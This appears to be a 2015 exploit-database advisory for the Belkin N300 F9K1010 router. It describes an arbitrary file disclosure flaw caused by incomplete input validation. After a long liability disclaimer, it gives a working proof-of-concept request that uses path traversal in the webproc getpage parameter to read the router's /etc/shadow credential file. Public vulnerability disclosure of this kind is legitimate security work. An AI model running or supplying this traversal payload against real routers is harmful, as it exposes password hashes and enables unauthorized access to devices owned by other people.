# Belkin N300 WiFi N Router F9K1010 # Arbitrary File Disclosure # # Copyright 2015 (c) Todor Donev # todor.donev@gmail.com # http://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # http://pastebin.com/u/hackerscommunity # # Version Info: # Firmware Version F9K1010_WW_1.00.06 # Hardware F9K1010 v1 # Boot Version v1.0.0 # # Description: # This vulnerability in the Belkin routers could # allow an attacker to read the contents of # arbitrary files. The vulnerability is due to # incomplete input validation. An attacker could # exploit this vulnerability by issuing a full # path to files. # # Disclaimer: # This or previous program is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, system # compromise, etc.) caused by the use of these # programs is not Todor Donev's responsibility. # # Use at your own risk and educational purpose # ONLY! # [todor@adamantium ~]$ GET "http://TARGET/cgi-bin/webproc?getpage=../../../../../../../../../../etc/shadow" # Iranian Exploit DataBase = http://IeDb.Ir [2015-10-19]